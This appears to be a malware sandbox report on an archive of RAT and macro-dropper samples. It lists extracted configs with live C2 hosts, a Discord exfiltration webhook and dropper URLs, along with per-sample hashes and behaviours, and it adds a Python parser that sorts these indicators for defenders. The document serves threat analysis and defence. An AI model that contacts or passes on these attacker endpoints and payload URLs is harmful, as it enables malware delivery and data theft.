General

  • Target

    250602-saf2yahp31.bin

  • Size

    466.8MB

  • Sample

    250602-sf34nahp9w

  • MD5

    72364945b46c400678b30759b1cdda52

  • SHA1

    55c1e9725dab3925e63943c5aa4329d6fee0012d

  • SHA256

    bd5ee1f6ebe18c36a0168c43f459f54fd133d35244b269e4ecef5bd2a484c72b

  • SHA512

    13a9ef2c624bde874181a33f21cf62f4ffa52a8a7e958a729088b7fab1462f4d71775934b10b1b1ac678f6e18d9f2832c33440aec8dbfe815348345bf8bbc42b

  • SSDEEP

    12582912:V3JuitJi1QjcTh6WzDfCP/Hs+6IQ23CvC9n6Vy8QC+xk:V3IiC1Q6hbzWPvs+TQICoOy//a

Malware Config

Extracted

Family

orcus

C2

192.168.171.129:10134

pont9245.ddns.net:7777

147.185.221.16:18244

hostip00.duckdns.org:10134

91.218.65.24:10134

s7vety-27063.portmap.host:27063

kissmyasshole.myddns.me:1012

Mutex

186d21ec80e143edb3384fa80d4ee7f8

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Extracted

Family

orcus

Botnet

Roblox script injector

C2

youcantfindmelol.ddns.net:10134

Mutex

de0e17d469cc46849280a8cd4d643763

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %programfiles%\Java\Java.exe

  • reconnect_delay

    10000

  • registry_keyname

    Java

  • taskscheduler_taskname

    Java Updater

  • watchdog_path

    Temp\Java Updater.exe

Extracted

Family

orcus

Botnet

NEW

C2

122.186.23.243:10134

Mutex

c7798e5973374c92859ce651077d0576

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %windir%\Desktop Window Manager.exe

  • reconnect_delay

    10000

  • registry_keyname

    Program

  • taskscheduler_taskname

    Windows

  • watchdog_path

    AppData\OrcusWatchdog.exe

Extracted

Family

orcus

Botnet

EMVLATEST

C2

3.tcp.eu.ngrok.io:22028

Mutex

699ea505fbd445a7924b6888db7a5f2a

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %programfiles%\Windows Security\Microsoft Defender.exe

  • reconnect_delay

    10000

  • registry_keyname

    javaservice

  • taskscheduler_taskname

    win10service

  • watchdog_path

    AppData\javaforwin.exe

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

friendlyman69.ddns.net:55042

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    lsass.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

darkcomet

Attributes
  • gencode

  • install

    false

  • offline_keylogger

    false

  • persistence

    false

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:5555

hostz.hopto.org:5555

172.65.175.19:443

127.0.0.1:7000

council-amp.gl.at.ply.gg:59436

28.ip.gl.ply.gg:65453

Mutex

Nyv6QFoXtqKjtLri

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    DMA Driver.exe

aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain

Extracted

Family

nanocore

Version

1.2.2.0

C2

90.120.50.244:2518

127.0.0.1:2518

Mutex

6baeca53-6eec-4a83-8679-c479f2f1a649

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    127.0.0.1

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2020-11-20T17:31:41.353489336Z

  • bypass_user_account_control

    false

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    2518

  • default_group

    Default

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    6baeca53-6eec-4a83-8679-c479f2f1a649

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    90.120.50.244

  • primary_dns_server

    8.8.8.8

  • request_elevation

    false

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    false

  • set_critical_process

    false

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

xworm

C2

studies-license.gl.at.ply.gg:48057

dpwekwpd-58261.portmap.io:58261

127.0.0.1:7000

127.0.0.1:2321

133.23.21.222:2321

28.ip.gl.ply.gg:65453

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1367163929452613703/0Ot4VsdGUKWdMg4T-pgsrzxgFAOyvGEFGDEYD7_CrEfiWkjJTQFitsIjIZavpL8rfypz

Extracted

Family

orcus

Botnet

NOOB NONAME

C2

26.223.23.213:25565

Mutex

378fcdd4ef824c7db5946dd1cf8ec64f

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    true

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    Temp\OrcusWatchdog.exe

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.toteteca.com/qzkiodlofm/5555555555.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zenithcampus.com/l/yQ/

exe.dropper

http://hbprivileged.com/cgi-bin/kcggF/

exe.dropper

http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/

exe.dropper

https://johnhaydenwrites.com/track_url/P/

exe.dropper

https://nahlasolimandesigns.com/nahla3/d/

exe.dropper

https://football-eg.com/web_map/n/

exe.dropper

https://vietnhabienhoa.com/wordpress/QUTy/

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zhongsijiacheng.com/wp-content/jn5/

exe.dropper

http://artistascitizen.com/wp-content/Bx3cr6/

exe.dropper

http://ombchardin.com/archive/V/

exe.dropper

https://apsolution.work/magneti-marelli-zkkmb/toq7Eiy/

exe.dropper

https://happycheftv.com/wp-admin/z6uGcbY/

exe.dropper

https://careercoachconnection.com/tenderometer/4K/

exe.dropper

https://tacademicos.com/content/JbF68i/
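The configuration blocks above are a line-oriented dump: a family name, optional botnet/version labels, one C2 endpoint per line, a mutex, and a bullet list of attributes whose value sits on the following line. Before those values can be used for blocking or hunting they need to be parsed and sorted. Loopback and RFC1918 entries such as 127.0.0.1:5555 or 192.168.171.129:10134 cannot reach an operator from a victim network, whereas the public IPs, dynamic-DNS names and tunnelling hosts (ngrok, playit, portmap) can; and the attribute values (Run value names, scheduled task names, install paths, mutexes) are exactly the host-side artefacts an incident responder sweeps for. The Python below is an added example, not the sandbox's own tooling: it parses that layout, classifies each C2, and collects the persistence artefacts. SAMPLE_REPORT is a constructed excerpt of two of the blocks above with the blank spacer lines removed; the record layout and function names are the author's choice.

```python
# Added example (not the sandbox vendor's code): parse the report's "Extracted" config
# blocks into IOCs. SAMPLE_REPORT is a constructed excerpt of two blocks from the report
# above, with the report's blank spacer lines removed (the parser ignores them anyway).
from __future__ import annotations
import ipaddress
from dataclasses import dataclass, field

SAMPLE_REPORT = r"""Extracted
Family
orcus
C2
122.186.23.243:10134
Mutex
c7798e5973374c92859ce651077d0576
Attributes
  • install_path
    %windir%\Desktop Window Manager.exe
  • registry_keyname
    Program
Extracted
Family
xworm
C2
127.0.0.1:5555
172.65.175.19:443
Attributes
  • Install_directory
    %Userprofile%
  • install_file
    DMA Driver.exe
"""

SCALAR_SECTIONS = {"Family": "family", "Botnet": "botnet", "Version": "version", "Mutex": "mutex"}

@dataclass
class C2:
    host: str
    port: int | None
    routable: bool | None   # None for DNS names and URLs; False for loopback/RFC1918 literals

@dataclass
class MalwareConfig:
    family: str = ""
    botnet: str = ""
    version: str = ""
    mutex: str = ""
    c2: list[C2] = field(default_factory=list)
    attributes: dict[str, str] = field(default_factory=dict)

def parse_c2(entry: str) -> C2:
    """Split 'host:port' (URLs are kept whole) and classify literal IPs."""
    if "://" in entry:
        return C2(entry, None, None)
    host, sep, port = entry.rpartition(":") if ":" in entry else (entry, "", "")
    try:
        routable = ipaddress.ip_address(host).is_global   # False for 127.0.0.1 and RFC1918
    except ValueError:
        routable = None                                   # DNS name: resolve separately
    return C2(host, int(port) if sep and port.isdigit() else None, routable)

def parse_extracted(text: str) -> list[MalwareConfig]:
    """Line-oriented state machine over the report layout; blank lines are ignored."""
    configs: list[MalwareConfig] = []
    cfg, section, pending_attr = MalwareConfig(), None, None   # cfg is scratch until the first block
    for line in map(str.strip, text.splitlines()):
        if not line:
            continue
        if line == "Extracted":                           # a new config block starts
            configs.append(cfg := MalwareConfig())
            section = pending_attr = None
        elif line in SCALAR_SECTIONS or line in ("C2", "Attributes"):
            section, pending_attr = line, None
        elif line.startswith("•"):                        # attribute name; its value is the next line
            pending_attr = line.lstrip("• ")
            cfg.attributes.setdefault(pending_attr, "")   # stays "" when no value follows
        elif pending_attr is not None:
            cfg.attributes[pending_attr] = line
            pending_attr = None
        elif section in SCALAR_SECTIONS:
            setattr(cfg, SCALAR_SECTIONS[section], line)
        elif section == "C2":
            cfg.c2.append(parse_c2(line))
    return configs

def hunt_artifacts(configs: list[MalwareConfig]) -> dict[str, set[str]]:
    """Host-side artefacts to sweep for: mutexes, Run value names, task names, dropped paths."""
    out: dict[str, set[str]] = {"mutexes": set(), "run_keys": set(), "tasks": set(), "paths": set()}
    for cfg in configs:
        a = cfg.attributes
        out["mutexes"] |= {cfg.mutex} - {""}
        out["run_keys"] |= {a.get("registry_keyname", "")} - {""}
        out["tasks"] |= {a.get("taskscheduler_taskname", "")} - {""}
        out["paths"] |= {a[k] for k in ("install_path", "watchdog_path") if a.get(k)}
        folder = a.get("install_folder") or a.get("Install_directory")   # AsyncRAT vs XWorm spelling
        if folder and a.get("install_file"):
            out["paths"].add(folder.rstrip("\\") + "\\" + a["install_file"])
    return out

def routable_c2(configs: list[MalwareConfig]) -> list[tuple[str, str, int | None]]:
    """(family, host, port) for every C2 that can reach an attacker; drops loopback/private IPs."""
    hits = {(c.family, x.host, x.port) for c in configs for x in c.c2 if x.routable is not False}
    return sorted(hits, key=lambda t: (t[0], t[1], t[2] or 0))
```

Two caveats when using the output. The Run value and task names in these configs ("Java", "Windows", "Program", "javaservice", "win10service") are deliberately generic, so sweep for the combination of name and install path rather than the name alone. And the DNS-name C2s (ddns.net, duckdns.org, ngrok, playit, portmap) are rented infrastructure that changes resolution frequently; block the hostname, not only the address it resolves to today.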

Targets

    • Target

      uploaded/057c3508b21674c3ab95c4c0f26a7195a6aba8d35464dfc97d96452479d430de.exe

    • Size

      2.7MB

    • MD5

      2648c64711a910797ec85e145d45fe3e

    • SHA1

      bca3cd7091f73be66213f7aac1bef1be1527bfb2

    • SHA256

      057c3508b21674c3ab95c4c0f26a7195a6aba8d35464dfc97d96452479d430de

    • SHA512

      129d8f7afbf4d05568df05319b2e684235e3392e3928252ad35c227abe22870114c6d343fded5ecbf98d105f16c7ddc0eb0487020f1b7efa785dcacd1c203e82

    • SSDEEP

      49152:ROnDZlOiVb/3pYBZpUh0QuM5enR/Iy1TqjUC6R5SAq6Iex20AB4T2zQbk3G4QZDv:ROzJVb/3QGgnR/Iy1TEUnbqiI0AB4XkC

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      uploaded/0f0d2abea57c5403fb538eef2e42d5003.exe

    • Size

      409KB

    • MD5

      3d6531f8f4eb1b41f62e8a55f033735f

    • SHA1

      aa250187efbbb4254d14949d862b41c6125b452c

    • SHA256

      f7f8ca0ae4af42baa3586561ce73cea45445e439eec867091704a696de334e96

    • SHA512

      505bb32692f7e65106dc55eb8fdb9eb0b4b095d1fbc6b3c33d496fbd9f540e7c05c0f42df3401c7d1933f0f48fb51844e61c5b6bdbf29a2d2ff273366076a121

    • SSDEEP

      12288:P//ZbUXN0kCD9pZ4QQxCQDrX2t9xqkHE7J:P3Zbm0BZvQxCgrXS9f6

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/0fec46875e62cf4c572c4cc4cc7e84374.exe

    • Size

      73KB

    • MD5

      c0bae473a586ca639fd3f0e2113ae32c

    • SHA1

      562c4595d866f71de81d72f2a1356dd0b266aa2f

    • SHA256

      d423b582ccf801825bf5a60d1c0a0ffdf5b06704507f327873d4790029753ffe

    • SHA512

      947863e46bb0a1275343a7383d6708dcacc1e53e9e6ff6c1006f527d838f7836670af9a446a01c11c01b292e8096ce8f3b51de7d8d142a17c691342ba00d3309

    • SSDEEP

      1536:Hj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGtP43KBp:3bFMzTFq+N48UxpP

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/1.exe

    • Size

      913KB

    • MD5

      c02308ef085b976898fa42b065254aa2

    • SHA1

      95e03e7644a56af5fefc12c32b2c86b2c20fe5af

    • SHA256

      6b4adc3f05b6f7968d826b26b6a472ad3906a5b659eae167bd3a922415c6133d

    • SHA512

      e64ee710eb5fedb7d7220a8876b64945a76f70e2880100b30d340e346d0880a98085c8c183f2796f6c706347de030124daeb5a8fcda7aff578bf1cb88ee484e5

    • SSDEEP

      24576:X+5T4MROxnFm5bHKTlQZrZlI0AilFEvxHizS9:u50MiAZrZlI0AilFEvxHi

    Score
    6/10
    • Drops desktop.ini file(s)

    • Target

      uploaded/123.exe

    • Size

      903KB

    • MD5

      264e7741729c68da987f40f4cd19a36f

    • SHA1

      16dc103026652605229355ced92127fd1c85bbc2

    • SHA256

      94ad5e95fc0167221e93b241d4890649158fb8a59272d9e96ad741d3b7e51fff

    • SHA512

      e2d5bd4fd3e08f69cb225e5c72d2a515770292df59c14c6f20c45cc1736145dc148ab2a05ff78ab560a84ca696fb7937a9a8d193696a2b8337eabc5f07ed9168

    • SSDEEP

      12288:00XCGPSX0zbyD+ndg+QCImGYUl9qyzlkE2kUNCVyrO12nIMmJPepjikbQ7dG1lF/:qPF4MROxnFNHrrcI0AilFEvxHPmooo

    • Orcus

      Orcus is a Remote Access Trojan that is being sold on underground forums.

    • Orcus family

    • Orcurs Rat Executable

    • Target

      uploaded/1546d38e814b5348b877ade61fa7cc0f7.exe

    • Size

      73KB

    • MD5

      2bbc55048c13c64ff4f381d02fd2e37d

    • SHA1

      c0de7b7c3bc33898db1134126bad349abc6eec6e

    • SHA256

      ba06a9df44bb8d2439f9ec8ef3cf7ab8349abdc9dc60593f5718785ceb4e7e76

    • SHA512

      3b9a62cb11ad5c5abc3466d4e2208242c421d801bbae4151fc36754d7c579cabe661a06ffa7bf30ad6257fa80f343ab295836281711396abffd0bdfe5dff6548

    • SSDEEP

      1536:zj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGtDl3K7:LbFMzTFq+N48U1E7

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/1812b1b80810a47d68157ec25c3a44e7b.exe

    • Size

      124KB

    • MD5

      1b83cb61b35c039591f2ff3380e04d81

    • SHA1

      f70328bdcddd8b70c847db5eba6f8fe777f99397

    • SHA256

      790353165b689048a77a6aa76010b561db500d85e3d3509b1ce869204129de49

    • SHA512

      3f43b80d07db00cb204890c9b62fe0563d456d6621a2bfacdbf9568b1e03562197fec849896c804b8c2fdc2f686fa2a244ad69261d2919b74857b973fe02e733

    • SSDEEP

      3072:5hjQjOmwnvFHygjCLf85f5EuO2qixYDZFeEI7:5hjVvFSgjCLf85f5h4ixYDZFm7

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/19a972ce0137c326e9a800096bc442276468096ad02c6dec2aba37564d0e441e.exe

    • Size

      1.9MB

    • MD5

      7c282de58057bcbd9fd001d5bd5c9728

    • SHA1

      13080576fcdd77d6219c948f33e242a1a3f19efb

    • SHA256

      19a972ce0137c326e9a800096bc442276468096ad02c6dec2aba37564d0e441e

    • SHA512

      15221e1da59d05d011809d95b3c235356cebc341ba04190edee4e1143bf3a5c415809a427419cf08f8a10c0c7772bc1427412199fbd588e6adfbca285e2d9eb4

    • SSDEEP

      49152:1fDODfDFnzD1Us+kMg7ZFZrr89UfT3MF:Cr8AMF

    Score
    1/10
    • Target

      Archivo_2001_2021_49-381887.doc

    • Size

      158KB

    • MD5

      74ab40efc21fceb14a432f7c4d000b67

    • SHA1

      5fb79750ab4f78e18c3d1800be5b2e9ac0959db3

    • SHA256

      89680559595f62f12bfdd9338c525133244ea6b7f23bb9b5b798ce04232817f0

    • SHA512

      d2abd2bebf5485aeaa570b4d019c426afaa1173f4f428eafecc617072c7f86242db306098ec3081135e71c69ae18b0f28504313f5f0cdd70f8634c3d1ed8a70d

    • SSDEEP

      3072:OL1QUTdcrrXyQBsc0vWJVi4IrwVdmZVT2Vq:OLC9PII4R2V

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Target

      Refusal-217432546-01212021.xlsm

    • Size

      25KB

    • MD5

      7a0ca2f162b86659f47411d39f8be75e

    • SHA1

      8ee78da95af22a1d01d3ec035eaccdeb5be44276

    • SHA256

      70a5d9ef163f6e6c7e32c366363d7d4e9a6cbb06df84802edd177acb907fe092

    • SHA512

      c22ffe07d03a3d605e77da77d4a8f5425bc32ae7da5bf1abe558b265f8cd396d83f4f438b620611f65b6d0383e75cf197d75807036f733123cc820f5ee471a95

    • SSDEEP

      384:4Mfowh92aGcoKKRR6xt7k5SV8m2ylTQ8aoVT0QNuzWKP8WZoms:4MflhQaGc7SsFk5S6f6TfW+u7DZRs

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Target

      uploaded/222.exe

    • Size

      907KB

    • MD5

      9474c8c2696babee986e8ae1bc46bd78

    • SHA1

      1bcbfc24030a8e09c15055ad90685cac7af24cb1

    • SHA256

      b2f324d6ae851aa65773d233201d58ac5230d525281afd1775e0b82514ac9645

    • SHA512

      bf03529601fb0a935188c6efd72e5d752aed5c23085ade870a385c47b746b8ce9927527c78ab61c28a4d4b8cf23217b1e74e76ee6e1644d85439646a216f5153

    • SSDEEP

      24576:ocI4MROxnFj3qxXFHXRrZlI0AilFEvxHiW8F:ocrMi1mRhrZlI0AilFEvxHiW

    • Orcus

      Orcus is a Remote Access Trojan that is being sold on underground forums.

    • Orcus family

    • Orcus main payload

    • Orcurs Rat Executable

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Drops desktop.ini file(s)

    • Target

      uploaded/2531 2212 2020 QG-826729.doc

    • Size

      213KB

    • MD5

      cf288a156f60cf132cf14c617b41a154

    • SHA1

      b4dbb03f48b651d2a81849a12049a9ac9f5295a2

    • SHA256

      3a15b42c4692483aedb912298719b52e5513cf3d2a58ffca07c78fa8c48b536c

    • SHA512

      f694cfad3e816fc7af937a6eca905ae4c1fa71fc1be1a2c4f56b9060bdfc2eb0fee520698b80bb92bdbfffedd13c50946a5e08f1f8e863a259629e9e419b754c

    • SSDEEP

      3072:O9ufstRUUKSns8T00JSHUgteMJ8qMD7gRyHYbwRe/dNx0tcn15rJDMsIxS:O9ufsfgIf0pLxbwQlNx0tw15rJDMsIxS

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Target

      uploaded/25f2c4054d0680fd51f2cf860055f2234.exe

    • Size

      162KB

    • MD5

      91106264680a5cc064c550a62c8650c7

    • SHA1

      67758edc66f1160728b82ab7608bb0cf1ad7fc5a

    • SHA256

      b3fb1ae7923313ad51ec2101c28fd1f1417cc987f33272227fdc1745c5e5261b

    • SHA512

      4a5dc892381f09c7628f71c386756026ca432e4614e26a46309fdd9d2453c76643f58ebe8e61cc0d567cb563a0ab484f18b85c90afa9b65aef14863fc166dbf3

    • SSDEEP

      3072:0LzOI+8oz3Y+u1gb2KoTJBJsHZ4AYsRmwRCRJJI3itUWJNem6q:0H2zTu1gbAvMZ4A9RPLpy

    Score
    3/10
    • Target

      uploaded/2bb792ea1927ddd3a5a245eaf96c06ca2598191f670750c24d5b9ed47f20e147.exe

    • Size

      9.8MB

    • MD5

      23e735b01c2f68b79d9e6cd8ac8e42f4

    • SHA1

      b3edba909b2fbdd8d0217bb956f3ee500f9ab137

    • SHA256

      2bb792ea1927ddd3a5a245eaf96c06ca2598191f670750c24d5b9ed47f20e147

    • SHA512

      44a0a253919ef8a956799bfd3fcd4e40dcbe21ef493a98597d798ed8c53f7d4e801b7f43c182d3df970f185696d46dcc05bb1f94895a863875da94ce282837ff

    • SSDEEP

      196608:JGtFyDDwRv5DFUhA7yUjCaoQLXtN9rEs2oLkdDPbrTOjJ/XY2a8nH36CJ5:otFyDDwRvl6hTjaoALAoL6DzrTYvvaK5

    Score
    7/10
    • Loads dropped DLL

    • Target

      uploaded/2e5473aa5ebf01ac5ce00c7ad537ddcb2.exe

    • Size

      73KB

    • MD5

      e1a1a8ec650e500872946774b1b9c30e

    • SHA1

      0622e0ab98bcd1a289732e4cad457e1474d84b4a

    • SHA256

      43e54d4e4f485f789739694024b6136f5e5215172555a846608abc8f5386c19a

    • SHA512

      fe659312fcb4ce55ece76bafbd61ffce5774fa51223b215276d4e1eac4176f0a717749ddc4af97d2bf7a81242d1ae5b25ae08329b245ab6a64e11fd2ccb0fa9a

    • SSDEEP

      1536:sj0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGtfW3Kn8:KbFMzTFq+N48UVj8

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/387812ee2820cbf49812b1b229b7d8721ee37296f7b6018332a56e30a99e1092.exe

    • Size

      144KB

    • MD5

      c2a760c6461449ac1d5a5538242bed11

    • SHA1

      59684c6261afc698c0f6a46658986f0268f4c5a0

    • SHA256

      387812ee2820cbf49812b1b229b7d8721ee37296f7b6018332a56e30a99e1092

    • SHA512

      b00734a77c70f18ed10049c67823316498208b32e9f662f9fa56074b862bd8606826947f8cb394ed48d0d9b88f47e7fa214153e53fbc83c60bb7075d57375dd8

    • SSDEEP

      3072:/29rIyJvv9Gq9q/uNKFO+oFGqN/xJCpgDjXYQWNoF97PYJ:e98S9Gq9WM5Z2mbYQWNslY

    Score
    3/10
    • Target

      uploaded/3c8ec4a8a8c3b1fbabc577576da5b70f5ddf3460b68775f3fbfa4fc07b6a7fa4.exe

    • Size

      11.8MB

    • MD5

      b777cfa3f6c7d8ad118caf620908a60d

    • SHA1

      46a0af09d1901ceaca3ccde27499ee1b91cdf0e1

    • SHA256

      3c8ec4a8a8c3b1fbabc577576da5b70f5ddf3460b68775f3fbfa4fc07b6a7fa4

    • SHA512

      f41be2c1673f8fe1f884b36a74b0e2e906702432375aab0934e7afaf329a576943a077a7369adf134136be26b823a699c025d3e5c0a7e54bf1d939a25ddf8745

    • SSDEEP

      196608:54F1KIlUrJyTOZzEwLVa1XwETq4FHsm1hmKXdFL5d3IH:yF4LyTOZ3LVgXwCDFHsm1hm8dJI

    Score
    8/10
    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops startup file

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Target

      uploaded/3ca0877ae8c3c628acfe78c6847f770fe20f02790f69749216cc703ab0618002.exe

    • Size

      1.4MB

    • MD5

      ac28e024b3b8e7a054dfaa2883a5590b

    • SHA1

      2ad3d0cb84a244acff393912c4b54c716d99c94c

    • SHA256

      3ca0877ae8c3c628acfe78c6847f770fe20f02790f69749216cc703ab0618002

    • SHA512

      b1c06d213b7f3753277516042f989c7ee62bd12c77736905f839531bcbd946db1010c2f96862da8362c5f7d639255e433e1220b256bd83690a265860f76e2465

    • SSDEEP

      24576:2h+EpSgP3ZEgRhuRKOODzjJBwjOGfcCUWgEf0ZsMCmGJHxyAXml2SAaj:qa+PjJaEWZAsTv2AE

    Score
    5/10
    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Target

      uploaded/4c6265723661653d2fdab12a0d5d7e841.exe

    • Size

      409KB

    • MD5

      916707fcffcec2b8ae25dd706486f469

    • SHA1

      6905656c07c1185b943520ea07980f422096f0a2

    • SHA256

      8e0bf3262f19da58a5e045c85d918e4a35b873dc1ac3a8c26dc7aa2fa07b59de

    • SHA512

      5c8e1fe8b4b2d8a3b75e0b5bc462a2c55ab9fad090b40dbf227195be0d1de7d025a4dac3bcffe611e076a96d905ad2c02e06b64218dc906cf2684332ea7cdab6

    • SSDEEP

      12288:V//ZbUXN0kCD9pZ4QQxCQDrX2t9xqkHE7o:V3Zbm0BZvQxCgrXS9fb

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/5b518173a571366bfdce5cdd282738a38.exe

    • Size

      124KB

    • MD5

      d2c28ef77a6a7ef28b84df3464343350

    • SHA1

      5b2d21c3a4ea1eb3f87da7a78a6fad36f47f87f8

    • SHA256

      fa2e2163cadd8dfefa97026e2f8c53540c436f05c7a0c60d25fec0025d39bf65

    • SHA512

      d6602c496c872f051641aee3888923302c1cc9c21c104c17ef4ca623e49ca75212ae9a2bb92adfb25c7c56439381e1310c1cdb764c0a89ef741eb23c4794dbf4

    • SSDEEP

      3072:AhjQjOmwnvFHygjCLf85f5EuO2qixYDZFeEQH:AhjVvFSgjCLf85f5h4ixYDZFmH

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/6a4af3ace8066e79a1020e27b2c1cc3f81d6cd8d68d1329e67b93e44b9d3d008.xls

    • Size

      173KB

    • MD5

      6917d9ca4f9604ee09d08d5c33e93955

    • SHA1

      dcdde605528c7678d80472df024b0b0a9846c2d6

    • SHA256

      6a4af3ace8066e79a1020e27b2c1cc3f81d6cd8d68d1329e67b93e44b9d3d008

    • SHA512

      c752681f5cf715ffb8b99ce1cb2c9c860dea19c428fe16d8cd3a7779f1fb40ec4dd9c3f642df226a54e5072946574e38881db615d0819d26faf4bda1bfb34b88

    • SSDEEP

      3072:8Gk3hbdlylKsgqopeJBWhZFGkE+cL2NdAs7tT3O8g+nstPBXn3d1p60COnKmR4nq:xk3hbdlylKsgqopeJBWhZFVE+W2NdAs6

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Target

      uploaded/6fecc453c515bb03d82132650d3d4c6bb.exe

    • Size

      73KB

    • MD5

      75eefc3917333126cb56caf4500cb90b

    • SHA1

      bc8540268e083379ac6d1f831dbbe4c58a4bd878

    • SHA256

      89a22cb4f3cd4a8d122bf5198642cd5ddfc8fcab309e6b0ee284a8d679da6aaa

    • SHA512

      ec002df43e15c841b83de648cf0195b7e8f1e9165dfc83b5fa08b2f13f9c1bc9fb97f1a90eb1792977ff3929f0200aa0d98fe5db1182b80757cf22d52d864b21

    • SSDEEP

      1536:Ij0eb32T01PQb3zTjbM6ptmJTYHjR9Ob4UGpGt7d3K3s:ebFMzTFq+N48Uhc8

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      uploaded/70730f33f4db9f15399c6e4a510a5c4eec3bf100206535155001a2b3adbb3077.exe

    • Size

      9.1MB

    • MD5

      e31052a27988895bf8ebdc1edeb3260a

    • SHA1

      f81548c4719fb228e38eb3b4e5f245ff48eaf817

    • SHA256

      70730f33f4db9f15399c6e4a510a5c4eec3bf100206535155001a2b3adbb3077

    • SHA512

      b2260c20369c86d844c66dacc4bfb94e4249968a753e3eaa3f46ce1548b50db434f55bd71c4cc6407d08943e707bdbd3d9e208da00edd72e2bc5fccd25ca2571

    • SSDEEP

      196608:JGgFyDDwRv5DFUhA7ClLskLUJge/2bJh0N4JLmILxgnnANnJzQcaT6ixhts:ogFyDDwRvl6hRLfUJg5leN4FvLxgniJh

    Score
    7/10
    • Loads dropped DLL

    • Target

      uploaded/70e835f3140dc2fbc211273727a8a8b4d.exe

    • Size

      489KB

    • MD5

      68975d70f5c844bc1fd923813d42b31b

    • SHA1

      3d07569e46b8e026b608fa5c5e4186abf58bf02e

    • SHA256

      aae4696fa35c74a7aa3e9b75ae37d4ffa9a81f64bf647c801252f3abb29c21d8

    • SHA512

      4d475614543df97037f327a3ca5faa10396eff193729ecd1da87dc66f0d2386e720d55095c9df92116d9206832db424680e95d9fad02bcdca0cd31aa91ea422c

    • SSDEEP

      12288:wrxZ//3SfgfZCgOAZw+i+vwnPWybFxJ8fk0:wtZ/VCgOAnAb+F

